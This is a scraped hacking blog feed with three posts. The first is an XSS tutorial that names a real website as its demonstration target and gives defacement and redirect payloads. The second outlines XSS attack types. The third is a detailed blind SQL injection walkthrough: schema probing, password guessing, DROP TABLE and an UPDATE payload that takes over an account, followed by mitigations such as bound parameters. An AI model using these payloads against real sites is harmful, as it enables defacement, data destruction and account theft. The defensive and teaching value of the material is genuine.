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" /> </div> XSS vulnerabilities occur due to weak coding of the web applications. Once the hacker finds this vulnerability he/she injects malicious codes(Usually in web forms) to steal session cookies and later the hacker uses those cookies to gain access to sensitive page content. <br />Xss Cross Site Scripting may be classified in two types:<br /><b>1.</b>Persistent XSS<br /><b>2.</b>Non Persistent XSS<br />In order to demonstrate a XSS attack I will take an example of a website:<br />_____________________________________________________________________<br /><blockquote><a href="http://www.redwrappings.co.in/">http://www.redwrappings.co.in</a></blockquote>_____________________________________________________________________<br /><br /><b>Checking the venerability </b><br />The simplest way to check the vulnerability is to enter the following code in the any web form present on the website<br />_____________________________________________________________________<br /><blockquote><b><script>alert(“XSS”)</script></b></blockquote>_____________________________________________________________________<br /><div style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss.bmp"><img alt="xss cross site scripting" class="size-full wp-image-1666 aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss.bmp" /></a></div>Once the attacker inserts the code A dialog box like the below one will appear:<br /><div style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.bmp"><img alt="" class="size-full wp-image-1667 aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.bmp" /></a></div><br /><b>Defacement</b><br /><div style="text-align: justify;">Now the attacker has found that the website is velnerable to an xss attack the attacker can do lots of damages to the website, The most common thing which the attacker will do is place his defacement image on that page showing that the website is hacked, For this purpose he will insert a code similar to the below one:</div>__________________________________________________________________ <br /><blockquote><b><html><body><IMG SRC=”http://site.com/yourDefaceIMAGE.png”></body></html></b></blockquote>___________________________________________________________________<br />Where <b>http://site.com/yourDefaceIMAGE.png </b>is the defacement image<br /><b>Inserting Flash Videos</b><br />The attacker can also insert flash videos by entering the following code in any web form present on the website<br /><b>Redirection</b><br /><div style="text-align: justify;">The attacker can also redirect the page to any particular page , In case if the hacker has managed to find XSS venerability in the a website like paypal.com or alertpay.com he can redirect that page to a Phisher Site(Fake login page) where the victim will loose his password, To redirect a an xssed page to another page the attacker will insert a code similar to the below one:</div><div style="text-align: justify;">___________________________________________________________________</div><blockquote><b><script>window.open( “http://www.google.com/” )</script></b></blockquote>___________________________________________________________________ <br /><div style="text-align: justify;"><b>Stealing Cookies</b></div><div style="text-align: justify;">Most of the attackers after finding a website venerable to xss will probably steal victims cookies to gain access to their account or private data this method is called Session hijacking, which is a detailed topic and I will be explaining in the later articles <img alt=":)" class="wp-smiley" src="http://www.hungry-hackers.com/wp-includes/images/smilies/icon_smile.gif" /> </div><div style="text-align: justify;">Hope you have learned some XSS ,Feel free to ask if you have any problem regarding the above information</div></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-79718337086798650572011-02-18T08:09:00.000-08:002011-06-27T20:13:52.750-07:00Cross Site Scripting (XSS) Attack Types<div dir="ltr" style="text-align: left;" trbidi="on"><br />XSS comes in three flavors of persistence, duration and damage. From XSSed they are: <br /><br />Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. <br /><h3>Type-0 attack</h3><br />1. Mallory sends a URL to Alice (via email or another mechanism) of a maliciously constructed web page. <br />2. Alice clicks on the link. <br />3. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer. <br />4. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone. <br />5. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer. <br /><br /><h3>Type-1 attack</h3><br />1. Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and store sensitive information, such as billing information. <br />2. Mallory observes that Bob's website contains a reflected XSS vulnerability. <br />3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, making it look as if it came from Bob (ie. the email is spoofed). <br />4. Alice visits the URL provided by Mallory while logged into Bob's website. <br />5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server. The script steals sensitive information (authentication credentials, billing info, etc) and sends this to Mallory's web server without Alice's knowledge. <br /><br /><h3>Type-2 attack</h3><br />1. Bob hosts a web site which allows users to post messages and other content to the site for later viewing by other members. <br />2. Mallory notices that Bob's website is vulnerable to a type 2 XSS attack. <br />3. Mallory posts a message, controversial in nature, which may encourage many other users of the site to view it. <br />4. Upon merely viewing the posted message, site users' session cookies or other credentials could be taken and sent to Mallory's webserver without their knowledge. <br />5. Later, Mallory logs in as other site users and posts messages on their behalf.... <br /><br />Please note, the preceding examples are merely a representation of common methods of exploit and are not meant to encompass all vectors of attack. <br /><br />Good video to watch, keeps things interesting, and XSS vulnerabilities are well worth knowing about, and learning how to defend against. <br /><br />Tags: xssed,xss,cross site scripting,hacking,hack,hacker,vulnerability,info sec,web hacking,web 2.0,fun </div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-80845054177779763712011-02-18T03:41:00.000-08:002011-06-27T20:13:52.751-07:00Learn SQL Queries<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7vcB-dEFCknUwnHF-yxEzIKEUc5XzLdwpOsyOGC8yadWuhx8bZ8Uf6GBb7UFg3BZtvxjn-okFYxzlZ8OFGTHQhYhDnv6yOfPmOKfcwht50rQrBeiFB4WUn9ppLibZseQRdqm34saEkyM/s1600/sqlinjection.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7vcB-dEFCknUwnHF-yxEzIKEUc5XzLdwpOsyOGC8yadWuhx8bZ8Uf6GBb7UFg3BZtvxjn-okFYxzlZ8OFGTHQhYhDnv6yOfPmOKfcwht50rQrBeiFB4WUn9ppLibZseQRdqm34saEkyM/s1600/sqlinjection.jpg" /></a></div>"SQL Injection" is subset of the an unverified/unsanitized user input vulnerability ("buffer overflows" are a different subset), and the idea is to convince the application to run SQL code that was not intended. If the application is creating SQL strings naively on the fly and then running them, it's straightforward to create some real surprises. <br />We'll note that this was a somewhat winding road with more than one wrong turn, and others with more experience will certainly have different -- and better -- approaches. But the fact that we were successful does suggest that we were not entirely misguided. <br />There have been other papers on SQL injection, including some that are much more detailed, but this one shows the rationale of <b>discovery</b> as much as the process of <b>exploitation</b>. <br /><br /><h1 id="target">The Target Intranet</h1>This appeared to be an entirely custom application, and we had no prior knowledge of the application nor access to the source code: this was a "blind" attack. A bit of poking showed that this server ran Microsoft's IIS 6 along with ASP.NET, and this suggested that the database was Microsoft's SQL server: we believe that these techniques can apply to nearly any web application backed by any SQL server. <br />The login page had a traditional username-and-password form, but also an email-me-my-password link; the latter proved to be the downfall of the whole system. <br />When entering an email address, the system presumably looked in the user database for that email address, and mailed something to that address. Since <b>my</b> email address is not found, it wasn't going to send <b>me</b> anything. <br />So the first test in any SQL-ish form is to enter a single quote as part of the data: the intention is to see if they construct an SQL string literally without sanitizing. When submitting the form with a quote in the email address, we get a 500 error (server failure), and this suggests that the "broken" input is actually being parsed literally. Bingo. <br />We speculate that the underlying SQL code looks something like this: <br /><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM <i>table</i><br /> WHERE <i>field</i> = '<span class="snip">$EMAIL</span>';<br /></pre>Here, <span class="snip">$EMAIL</span> is the address submitted on the form by the user, and the larger query provides the quotation marks that set it off as a literal string. We don't know the specific <i>names</i> of the fields or table involved, but we do know their <i>nature</i>, and we'll make some good guesses later. <br />When we enter <span class="snip">steve@unixwiz.net'</span> - note the closing quote mark - this yields constructed SQL: <br /><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM <i>table</i><br /> WHERE <i>field</i> = '<span class="snip">steve@unixwiz.net'</span>';<br /></pre>when this is executed, the SQL parser find the extra quote mark and aborts with a syntax error. How this manifests itself to the user depends on the application's internal error-recovery procedures, but it's usually different from "email address is unknown". This error response is a dead giveaway that user input is not being sanitized properly and that the application is ripe for exploitation. <br />Since the data we're filling in appears to be in the <b>WHERE</b> clause, let's change the nature of that clause <i>in an SQL legal way</i> and see what happens. By entering <span class="snip">anything' OR 'x'='x</span>, the resulting SQL is: <br /><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM <i>table</i><br /> WHERE <i>field</i> = '<span class="snip">anything' OR 'x'='x</span>';<br /></pre>Because the application is not really thinking about the query - merely constructing a string - our use of quotes has turned a single-component <b>WHERE</b> clause into a two-component one, and the <b>'x'='x'</b> clause is <b>guaranteed to be true</b> no matter what the first clause is (there is a better approach for this "always true" part that we'll touch on later). <br />But unlike the "real" query, which should return only a single item each time, this version will essentially return every item in the members database. The only way to find out what the application will do in this circumstance is to try it. Doing so, we were greeted with: <br /><blockquote><hr />Your login information has been mailed to <i>random.person@example.com</i>. <br /><hr /></blockquote>Our best guess is that it's the <i>first</i> record returned by the query, effectively an entry taken at random. This person really did get this forgotten-password link via email, which will probably come as surprise to him and may raise warning flags somewhere. <br />We now know that we're able to manipulate the query to our own ends, though we still don't know much about the parts of it we cannot see. But we <b>have</b> observed three different responses to our various inputs: <br /><ul><li> "Your login information has been mailed to <i>email</i>" </li><li> "We don't recognize your email address" </li><li> Server error </li></ul>The first two are responses to well-formed SQL, while the latter is for bad SQL: this distinction will be very useful when trying to guess the structure of the query. <br /><h1 id="map">Schema field mapping</h1>The first steps are to guess some field names: we're reasonably sure that the query includes "email address" and "password", and there may be things like "US Mail address" or "userid" or "phone number". We'd dearly love to perform a <b>SHOW TABLE</b>, but in addition to not knowing the name of the table, there is no obvious vehicle to get the output of this command routed to us. <br />So we'll do it in steps. In each case, we'll show the whole query as we know it, with our own snippets shown specially. We know that the tail end of the query is a comparison with the email address, so let's guess <b>email</b> as the name of the field: <br /><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM <i>table</i><br /> WHERE <i>field</i> = '<span class="snip">x' AND email IS NULL; --</span>';<br /></pre>The intent is to use a proposed field name (<b>email</b>) in the constructed query and find out if the SQL is valid or not. We don't care about matching the email address (which is why we use a dummy <b>'x'</b>), and the <b>--</b> marks the start of an SQL comment. This is an effective way to "consume" the final quote provided by application and not worry about matching them. <br />If we get a server error, it means our SQL is malformed and a syntax error was thrown: it's most likely due to a bad field name. If we get any kind of valid response, we guessed the name correctly. This is the case whether we get the "email unknown" or "password was sent" response. <br />Note, however, that we use the <b>AND</b> conjunction instead of <b>OR</b>: this is intentional. In the SQL schema mapping phase, we're not really concerned with guessing any particular email addresses, and we do not want random users inundated with "here is your password" emails from the application - this will surely raise suspicions to no good purpose. By using the <b>AND</b> conjunction with an email address that couldn't ever be valid, we're sure that the query will always return zero rows and never generate a password-reminder email. <br />Submitting the above snippet indeed gave us the "email address unknown" response, so now we know that the email address is stored in a field <b>email</b>. If this hadn't worked, we'd have tried <b>email_address</b> or <b>mail</b> or the like. This process will involve quite a lot of guessing. <br />Next we'll guess some other obvious names: password, user ID, name, and the like. These are all done one at a time, and anything other than "server failure" means we guessed the name correctly. <br /><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM <i>table</i><br /> WHERE <b>email</b> = '<span class="snip">x' AND userid IS NULL; --</span>';<br /></pre>As a result of this process, we found several valid field names: <br /><ul><li> email </li><li> passwd </li><li> login_id </li><li> full_name </li></ul>There are certainly more (and a good source of clues is the names of the fields on <b>forms</b>), but a bit of digging did not discover any. But we still don't know the name of the <b>table</b> that these fields are found in - how to find out? <br /><h1 id="findname">Finding the table name</h1>The application's built-in query already has the table name built into it, but we don't know what that name is: there are several approaches for finding that (and other) table names. The one we took was to rely on a <b>subselect</b>. <br />A standalone query of <br /><pre class="codeblock">SELECT COUNT(*) FROM <i>tabname</i><br /></pre>Returns the number of records in that table, and of course fails if the table name is unknown. We can build this into our string to probe for the table name: <br /><pre class="codeblock">SELECT email, passwd, login_id, full_name<br /> FROM <i>table</i><br /> WHERE <b>email</b> = '<span class="snip">x' AND 1=(SELECT COUNT(*) FROM <i>tabname</i>); --</span>';<br /></pre>We don't care how many records are there, of course, only whether the table name is valid or not. By iterating over several guesses, we eventually determined that <b>members</b> was a valid table in the database. But is it the table used in <b>this</b> query? For that we need yet another test using <b>table</b>.<b>field</b> notation: it only works for tables that are actually part of this query, not merely that the table exists. <br /><pre class="codeblock">SELECT email, passwd, login_id, full_name<br /> FROM members<br /> WHERE email = '<span class="snip">x' AND members.email IS NULL; --</span>';<br /></pre>When this returned "Email unknown", it confirmed that our SQL was well formed and that we had properly guessed the table name. This will be important later, but we instead took a different approach in the interim. <br /><h1 id="finduser">Finding some users</h1>At this point we have a partial idea of the structure of the <b>members</b> table, but we only know of one username: the random member who got our initial "Here is your password" email. Recall that we never received the message itself, only the address it was sent to. We'd like to get some more names to work with, preferably those likely to have access to more data. <br />The first place to start, of course, is the company's website to find who is who: the "About us" or "Contact" pages often list who's running the place. Many of these contain email addresses, but even those that don't list them can give us some clues which allow us to find them with our tool. <br />The idea is to submit a query that uses the <b>LIKE</b> clause, allowing us to do partial matches of names or email addresses in the database, each time triggering the "We sent your password" message and email. <b>Warning</b>: though this reveals an email address each time we run it, it also actually sends that email, which may raise suspicions. This suggests that we take it easy. <br />We can do the query on email name or full name (or presumably other information), each time putting in the <b>%</b> wildcards that <b>LIKE</b> supports: <br /><pre class="codeblock">SELECT email, passwd, login_id, full_name<br /> FROM members<br /> WHERE email = '<span class="snip">x' OR full_name LIKE '%Bob%</span>';<br /></pre>Keep in mind that even though there may be more than one "Bob", we only get to see one of them: this suggests refining our <b>LIKE</b> clause narrowly. <br />Ultimately, we may only need one valid email address to leverage our way in. <br /><h1 id="pass">Brute-force password guessing</h1>One can certainly attempt brute-force guessing of passwords at the main login page, but many systems make an effort to detect or even prevent this. There could be logfiles, account lockouts, or other devices that would substantially impede our efforts, but because of the non-sanitized inputs, we have another avenue that is much less likely to be so protected. <br />We'll instead do actual password testing in our snippet by including the email name and password directly. In our example, we'll use our victim, <b>bob@example.com</b> and try multiple passwords. <br /><pre class="codeblock">SELECT email, passwd, login_id, full_name<br /> FROM members<br /> WHERE email = '<span class="snip">bob@example.com' AND passwd = 'hello123</span>';<br /></pre>This is clearly well-formed SQL, so we don't expect to see any server errors, and we'll know we found the password when we receive the "your password has been mailed to you" message. Our mark has now been tipped off, but we do have his password. <br />This procedure can be automated with scripting in perl, and though we were in the process of creating this script, we ended up going down another road before actually trying it. <br /><h1 id="noro">The database isn't readonly</h1>So far, we have done nothing but <b>query</b> the database, and even though a <b>SELECT</b> is readonly, that doesn't mean that <b>SQL</b> is. SQL uses the semicolon for statement termination, and if the input is not sanitized properly, there may be nothing that prevents us from stringing our own unrelated command at the end of the query. <br />The most drastic example is: <br /><pre class="codeblock">SELECT email, passwd, login_id, full_name<br /> FROM members<br /> WHERE email = '<span class="snip">x'; DROP TABLE members; --</span>'; -- Boom!<br /></pre>The first part provides a dummy email address -- <b>'x'</b> -- and we don't care what this query returns: we're just getting it out of the way so we can introduce an unrelated SQL command. This one attempts to drop (delete) the entire <b>members</b> table, which really doesn't seem too sporting. <br />This shows that not only can we run separate SQL commands, but we can also modify the database. This is promising. <br /><h1 id="addnew">Adding a new member</h1>Given that we know the partial structure of the <b>members</b> table, it seems like a plausible approach to attempt adding a new record to that table: if this works, we'll simply be able to login directly with our newly-inserted credentials. <br />This, not surprisingly, takes a bit more SQL, and we've wrapped it over several lines for ease of presentation, but our part is still one contiguous string: <br /><pre class="codeblock">SELECT email, passwd, login_id, full_name<br /> FROM members<br /> WHERE email = '<span class="snip">x';</span><br /> <span class="snip">INSERT INTO members ('email','passwd','login_id','full_name') </span><br /> <span class="snip">VALUES ('steve@unixwiz.net','hello','steve','Steve Friedl');--</span>';<br /></pre>Even if we have actually gotten our field and table names right, several things could get in our way of a successful attack: <br /><ol><li>We might not have enough room in the web form to enter this much text directly (though this can be worked around via scripting, it's much less convenient). </li><li>The web application user might not have <b>INSERT</b> permission on the <b>members</b> table. </li><li>There are undoubtedly other fields in the <b>members</b> table, and some may <i>require</i> initial values, causing the <b>INSERT</b> to fail. </li><li>Even if we manage to insert a new record, the application itself might not behave well due to the auto-inserted NULL fields that we didn't provide values for. </li><li>A valid "member" might require not only a record in the <b>members</b> table, but associated information in other tables (say, "accessrights"), so adding to one table alone might not be sufficient. </li></ol>In the case at hand, we hit a roadblock on either #4 or #5 - we can't really be sure -- because when going to the main login page and entering in the above username + password, a server error was returned. This suggests that fields we did not populate were vital, but nevertheless not handled properly. <br />A possible approach here is attempting to guess the other fields, but this promises to be a long and laborious process: though we may be able to guess other "obvious" fields, it's very hard to imagine the bigger-picture organization of this application. <br />We ended up going down a different road. <br /><h1 id="mail">Mail me a password</h1>We then realized that though we are not able to add a new record to the <b>members</b> database, we can <b>modify</b> an existing one, and this proved to be the approach that gained us entry. <br />From a previous step, we knew that <b>bob@example.com</b> had an account on the system, and we used our SQL injection to update his database record with <b>our</b> email address: <br /><pre class="codeblock">SELECT email, passwd, login_id, full_name<br /> FROM members<br /> WHERE email = '<span class="snip">x';</span><br /> <span class="snip">UPDATE members</span><br /> <span class="snip">SET email = 'steve@unixwiz.net'</span><br /> <span class="snip">WHERE email = 'bob@example.com</span>';<br /></pre>After running this, we of course received the "we didn't know your email address", but this was expected due to the dummy email address provided. The <b>UPDATE</b> wouldn't have registered with the application, so it executed quietly. <br />We then used the regular "I lost my password" link - with the updated email address - and a minute later received this email: <br /><pre class="email">From: system@example.com<br />To: steve@unixwiz.net<br />Subject: Intranet login<br /><br />This email is in response to your request for your Intranet log in information.<br />Your User ID is: bob<br />Your password is: hello<br /></pre>Now it was now just a matter of following the standard login process to access the system as a high-ranked MIS staffer, and this was far superior to a perhaps-limited user that we might have created with our <b>INSERT</b> approach. <br />We found the intranet site to be quite comprehensive, and it included - among other things - a list of all the users. It's a fair bet that many Intranet sites also have accounts on the corporate Windows network, and perhaps some of them have used the same password in both places. Since it's clear that we have an easy way to retrieve any Intranet password, and since we had located an open PPTP VPN port on the corporate firewall, it should be straightforward to attempt this kind of access. <br />We had done a spot check on a few accounts without success, and we can't really know whether it's "bad password" or "the Intranet account name differs from the Windows account name". But we think that automated tools could make some of this easier. <br /><h1 id="other">Other Approaches</h1>In this particular engagement, we obtained enough access that we did not feel the need to do much more, but other steps could have been taken. We'll touch on the ones that we can think of now, though we are quite certain that this is not comprehensive. <br />We are also aware that not all approaches work with all databases, and we can touch on some of them here. <br /><dl class="defnlist"><dt> Use xp_cmdshell </dt><dd>Microsoft's SQL Server supports a stored procedure <a href="http://msdn.microsoft.com/library/en-us/tsqlref/ts_xp_aa-sz_4jxo.asp">xp_cmdshell </a> that permits what amounts to arbitrary command execution, and if this is permitted to the web user, complete compromise of the webserver is inevitable. </dd><dd>What we had done so far was limited to the web application and the underlying database, but if we can run commands, the webserver itself cannot help but be compromised. Access to <b>xp_cmdshell</b> is usually limited to administrative accounts, but it's possible to grant it to lesser users. </dd><dt> Map out more database structure </dt><dd>Though this particular application provided such a rich post-login environment that it didn't really seem necessary to dig further, in other more limited environments this may not have been sufficient. </dd><dd>Being able to systematically map out the available schema, including tables and their field structure, can't help but provide more avenues for compromise of the application. </dd><dd>One could probably gather more hints about the structure from other aspects of the website (e.g., is there a "leave a comment" page? Are there "support forums"?). Clearly, this is highly dependent on the application and it relies very much on making good guesses. </dd></dl><h1 id="miti">Mitigations</h1>We believe that web application developers often simply do not think about "surprise inputs", but security people do (including the bad guys), so there are three broad approaches that can be applied here. <br /><dl class="defnlist"><dt> Sanitize the input </dt><dd>It's absolutely vital to sanitize user inputs to insure that they do not contain dangerous codes, whether to the SQL server or to HTML itself. One's first idea is to strip out "bad stuff", such as quotes or semicolons or escapes, but this is a misguided attempt. Though it's easy to point out <b>some</b> dangerous characters, it's harder to point to <b>all</b> of them. </dd><dd>The language of the web is full of special characters and strange markup (including alternate ways of representing the same characters), and efforts to authoritatively identify all "bad stuff" are unlikely to be successful. </dd><dd>Instead, rather than "remove known bad data", it's better to "remove everything but known good data": this distinction is crucial. Since - in our example - an email address can contain only these characters: </dd><dd><pre class="codeblock">abcdefghijklmnopqrstuvwxyz<br />ABCDEFGHIJKLMNOPQRSTUVWXYZ<br />0123456789<br />@.-_+<br /></pre></dd><dd>There is really no benefit in allowing characters that could not be valid, and rejecting them early - presumably with an error message - not only helps forestall SQL Injection, but also catches mere typos early rather than stores them into the database. </dd><dd><blockquote><small>Sidebar on email addresses</small><hr />It's important to note here that email addresses <i>in particular</i> are troublesome to validate programmatically, because everybody seems to have his own idea about what makes one "valid", and it's a shame to exclude a good email address because it contains a character you didn't think about. The only real authority is <a href="http://rfc.net/rfc2822.html">RFC 2822</a> (which encompasses the more familiar RFC822), and it includes a fairly expansive definition of what's allowed. The truly pedantic may well wish to accept email addresses with ampersands and asterisks (among other things) as valid, but others - including this author - are satisfied with a reasonable subset that includes "most" email addresses. Those taking a more restrictive approach ought to be fully aware of the consequences of excluding these addresses, especially considering that better techniques (prepare/execute, stored procedures) obviate the security concerns which those "odd" characters present. <hr /></blockquote></dd><dd>Be aware that "sanitizing the input" doesn't mean merely "remove the quotes", because even "regular" characters can be troublesome. In an example where an integer ID value is being compared against the user input (say, a numeric PIN): </dd><dd><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM <i>table</i><br /> WHERE id = <span class="snip">23 OR 1=1</span>; -- Boom! Always matches!<br /></pre></dd><dd>In practice, however, this approach is highly limited because there are so few fields for which it's possible to outright exclude many of the dangerous characters. For "dates" or "email addresses" or "integers" it may have merit, but for any kind of real application, one simply cannot avoid the other mitigations. </dd><dt> Escape/Quotesafe the input </dt><dd>Even if one might be able to sanitize a phone number or email address, one cannot take this approach with a "name" field lest one wishes to exclude the likes of Bill <b>O'Reilly</b> from one's application: a quote is simply a valid character for this field. </dd><dd>One includes an actual single quote in an SQL string by putting two of them together, so this suggests the obvious - but wrong! - technique of preprocessing every string to replicate the single quotes: </dd><dd><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM customers<br /> WHERE name = '<span class="snip">Bill O''Reilly</span>'; -- works OK<br /></pre></dd><dd>However, this naïve approach can be beaten because most databases support other string escape mechanisms. MySQL, for instance, also permits <b>\'</b> to escape a quote, so after input of <span class="snip">\'; DROP TABLE users; --</span> is "protected" by doubling the quotes, we get: </dd><dd><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM customers<br /> WHERE name = '<span class="snip">\''; DROP TABLE users; --</span>'; -- Boom!<br /></pre></dd><dd>The expression <span class="snip">'\''</span> is a complete string (containing just one single quote), and the usual SQL shenanigans follow. It doesn't stop with backslashes either: there is Unicode, other encodings, and parsing oddities all hiding in the weeds to trip up the application designer. </dd><dd>Getting quotes right is <b>notoriously</b> difficult, which is why many database interface languages provide a function that does it for you. When the same internal code is used for "string quoting" and "string parsing", it's much more likely that the process will be done properly and safely. </dd><dd>Some examples are the MySQL function <b>mysql_real_escape_string()</b> and perl DBD method <b>$dbh->quote($value)</b>. </dd><dd><b><i>These methods must be used</i></b>. </dd><dt> Use bound parameters (the <b>PREPARE</b> statement) </dt><dd>Though quotesafing is a good mechanism, we're still in the area of "considering user input as SQL", and a much better approach exists: <b>bound parameters</b>, which are supported by essentially all database programming interfaces. In this technique, an SQL statement string is created with placeholders - a question mark for each parameter - and it's compiled ("prepared", in SQL parlance) into an internal form. </dd><dd>Later, this prepared query is "executed" with a list of parameters: </dd><dd><div class="blocklabel">Example in perl</div><pre class="codeblock">$sth = $dbh->prepare("SELECT email, userid FROM members WHERE email = <span class="snip">?</span>;");<br /><br />$sth->execute(<span class="snip">$email</span>);<br /></pre></dd><dd>Thanks to Stefan Wagner, this demonstrates bound parameters in Java: </dd><dd><div class="blocklabel">Insecure version</div><pre class="codeblock">Statement s = connection.createStatement();<br />ResultSet rs = s.executeQuery("SELECT email FROM member WHERE name = "<br /> + <span class="snip">formField</span>); // *boom*<br /></pre></dd><dd><div class="blocklabel">Secure version</div><pre class="codeblock">PreparedStatement ps = connection.prepareStatement(<br /> "SELECT email FROM member WHERE name = <span class="snip">?</span>");<br />ps.setString(1, <span class="snip">formField</span>);<br />ResultSet rs = ps.executeQuery();<br /></pre></dd><dd>Here, <b>$email</b> is the data obtained from the user's form, and it is passed as positional parameter #1 (the first question mark), and at no point do the contents of this variable have anything to do with SQL statement parsing. Quotes, semicolons, backslashes, SQL comment notation - none of this has any impact, because it's "just data". There simply is nothing to subvert, so the application is be largely immune to SQL injection attacks. </dd><dd>There also may be some performance benefits if this prepared query is reused multiple times (it only has to be parsed <i>once</i>), but this is minor compared to the <b>enormous</b> security benefits. This is probably the single most important step one can take to secure a web application. </dd><dt> Limit database permissions and segregate users </dt><dd>In the case at hand, we observed just two interactions that are made not in the context of a logged-in user: "log in" and "send me password". The web application ought to use a database connection with the most limited rights possible: query-only access to the <b>members</b> table, and no access to any other table. </dd><dd>The effect here is that even a "successful" SQL injection attack is going to have much more limited success. Here, we'd not have been able to do the <b>UPDATE</b> request that ultimately granted us access, so we'd have had to resort to other avenues. </dd><dd>Once the web application determined that a set of valid credentials had been passed via the login form, it would then switch that session to a database connection with more rights. </dd><dd>It should go almost without saying that <b>sa</b> rights should <i>never</i> be used for any web-based application. </dd><dt> Use stored procedures for database access </dt><dd>When the database server supports them, use stored procedures for performing access on the application's behalf, which can eliminate SQL entirely (assuming the stored procedures themselves are written properly). </dd><dd>By encapsulating the rules for a certain action - query, update, delete, etc. - into a single procedure, it can be tested and documented on a standalone basis and business rules enforced (for instance, the "add new order" procedure might reject that order if the customer were over his credit limit). </dd><dd>For simple queries this might be only a minor benefit, but as the operations become more complicated (or are used in more than one place), having a single definition for the operation means it's going to be more robust and easier to maintain. </dd><dd><b>Note</b>: it's always possible to write a stored procedure that itself constructs a query dynamically: this provides <b>no</b> protection against SQL Injection - it's only proper binding with prepare/execute or direct SQL statements with bound variables that provide this protection. </dd><dt> Isolate the webserver 